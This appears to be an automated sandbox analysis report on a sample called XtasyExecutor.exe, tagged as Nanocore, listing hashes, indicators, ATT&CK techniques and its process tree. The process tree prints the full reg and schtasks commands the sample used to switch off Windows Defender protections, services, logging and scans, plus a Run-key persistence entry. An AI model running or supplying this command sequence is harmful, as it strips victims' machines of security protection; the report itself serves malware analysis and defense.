Analysis
-
max time kernel
47s -
max time network
59s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
17-12-2024 18:58
Behavioral task
behavioral1
Sample
XtasyExecutor.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
XtasyExecutor.exe
Resource
win11-20241007-en
General
-
Target
XtasyExecutor.exe
-
Size
202KB
-
MD5
20bd0480bb862bd1d073477a87aede81
-
SHA1
3c7c72fc3c1bec023386ac6ed14ad5cb785fe4ce
-
SHA256
548529c38438f4a9aea915448e183f24d4ddbe793a86090075775a154d59f067
-
SHA512
6b4817a7921bb62bbaf6835a3948a1811914f652f5f6ad86fe0b52376b6347d180488c3de4f02ba8ec962c45c5b4d6ad91eba11441989bbb42dab2863dfaa766
-
SSDEEP
6144:gLV6Bta6dtJmakIM5E/hBp4OnvF3ZO2hdi:gLV6BtpmkJBprnvF3AWi
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Nanocore family
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DOS Monitor = "C:\\Program Files (x86)\\DOS Monitor\\dosmon.exe" XtasyExecutor.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XtasyExecutor.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\DOS Monitor\dosmon.exe XtasyExecutor.exe File opened for modification C:\Program Files (x86)\DOS Monitor\dosmon.exe XtasyExecutor.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XtasyExecutor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe 4216 XtasyExecutor.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4216 XtasyExecutor.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4216 XtasyExecutor.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4216 wrote to memory of 1976 4216 XtasyExecutor.exe 78 PID 4216 wrote to memory of 1976 4216 XtasyExecutor.exe 78 PID 4216 wrote to memory of 1976 4216 XtasyExecutor.exe 78 PID 4216 wrote to memory of 3164 4216 XtasyExecutor.exe 80 PID 4216 wrote to memory of 3164 4216 XtasyExecutor.exe 80 PID 4216 wrote to memory of 3164 4216 XtasyExecutor.exe 80 PID 3164 wrote to memory of 3436 3164 cmd.exe 82 PID 3164 wrote to memory of 3436 3164 cmd.exe 82 PID 3164 wrote to memory of 3436 3164 cmd.exe 82 PID 3164 wrote to memory of 4752 3164 cmd.exe 83 PID 3164 wrote to memory of 4752 3164 cmd.exe 83 PID 3164 wrote to memory of 4752 3164 cmd.exe 83 PID 3164 wrote to memory of 1568 3164 cmd.exe 84 PID 3164 wrote to memory of 1568 3164 cmd.exe 84 PID 3164 wrote to memory of 1568 3164 cmd.exe 84 PID 3164 wrote to memory of 1744 3164 cmd.exe 85 PID 3164 wrote to memory of 1744 3164 cmd.exe 85 PID 3164 wrote to memory of 1744 3164 cmd.exe 85 PID 3164 wrote to memory of 2320 3164 cmd.exe 86 PID 3164 wrote to memory of 2320 3164 cmd.exe 86 PID 3164 wrote to memory of 2320 3164 cmd.exe 86 PID 3164 wrote to memory of 2488 3164 cmd.exe 87 PID 3164 wrote to memory of 2488 3164 cmd.exe 87 PID 3164 wrote to memory of 2488 3164 cmd.exe 87 PID 3164 wrote to memory of 4016 3164 cmd.exe 88 PID 3164 wrote to memory of 4016 3164 cmd.exe 88 PID 3164 wrote to memory of 4016 3164 cmd.exe 88 PID 3164 wrote to memory of 2312 3164 cmd.exe 89 PID 3164 wrote to memory of 2312 3164 cmd.exe 89 PID 3164 wrote to memory of 2312 3164 cmd.exe 89 PID 3164 wrote to memory of 32 3164 cmd.exe 90 PID 3164 wrote to memory of 32 3164 cmd.exe 90 PID 3164 wrote to memory of 32 3164 cmd.exe 90 PID 3164 wrote to memory of 4104 3164 cmd.exe 91 PID 3164 wrote to memory of 4104 3164 cmd.exe 91 PID 3164 wrote to memory of 4104 3164 cmd.exe 91 PID 3164 wrote to memory of 652 3164 cmd.exe 92 PID 3164 wrote to memory of 652 3164 cmd.exe 92 PID 3164 wrote to memory of 652 3164 cmd.exe 92 PID 3164 wrote to memory of 1436 3164 cmd.exe 93 PID 3164 wrote to memory of 1436 3164 cmd.exe 93 PID 3164 wrote to memory of 1436 3164 cmd.exe 93 PID 3164 wrote to memory of 1920 3164 cmd.exe 94 PID 3164 wrote to memory of 1920 3164 cmd.exe 94 PID 3164 wrote to memory of 1920 3164 cmd.exe 94 PID 3164 wrote to memory of 3200 3164 cmd.exe 95 PID 3164 wrote to memory of 3200 3164 cmd.exe 95 PID 3164 wrote to memory of 3200 3164 cmd.exe 95 PID 3164 wrote to memory of 4376 3164 cmd.exe 96 PID 3164 wrote to memory of 4376 3164 cmd.exe 96 PID 3164 wrote to memory of 4376 3164 cmd.exe 96 PID 3164 wrote to memory of 5108 3164 cmd.exe 97 PID 3164 wrote to memory of 5108 3164 cmd.exe 97 PID 3164 wrote to memory of 5108 3164 cmd.exe 97 PID 3164 wrote to memory of 2384 3164 cmd.exe 98 PID 3164 wrote to memory of 2384 3164 cmd.exe 98 PID 3164 wrote to memory of 2384 3164 cmd.exe 98 PID 3164 wrote to memory of 2184 3164 cmd.exe 99 PID 3164 wrote to memory of 2184 3164 cmd.exe 99 PID 3164 wrote to memory of 2184 3164 cmd.exe 99 PID 3164 wrote to memory of 4584 3164 cmd.exe 100 PID 3164 wrote to memory of 4584 3164 cmd.exe 100 PID 3164 wrote to memory of 4584 3164 cmd.exe 100 PID 3164 wrote to memory of 4532 3164 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\XtasyExecutor.exe"C:\Users\Admin\AppData\Local\Temp\XtasyExecutor.exe"1⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ba85a293.bat" "2⤵
- System Location Discovery: System Language Discovery
PID:1976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\612153ef.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- System Location Discovery: System Language Discovery
PID:3436
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:4752
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:1744
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2488
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4016
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:32
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4104
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:652
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:1436
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1920
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:4376
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:2384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:2184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:4584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:4532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:1280
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:1828
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:1520
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:5100
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:3996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:824
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:244
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2548
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3448
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:900
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD510e9d7377b7fd4df43145ae4c8b136b3
SHA14002ba143ff336f631d36c6afd93464822ba541e
SHA2561b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1
SHA512c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885
-
Filesize
1KB
MD517d9544ded65779dcdaf02d77fbdde99
SHA1cd29db919a6abdd50d18de9c0215904350a8455d
SHA256d3f6297e3ca5b593fdefeb24619324111ca2c1bc984af27414bbcb47f9e269e0
SHA512709ed458c1433c0686828406eaf1e142704f18bca52db846af4c8117f0d81b0975af071c89b45fa7923bd6a2900066d3863e7703357f26906dec630e25c60d94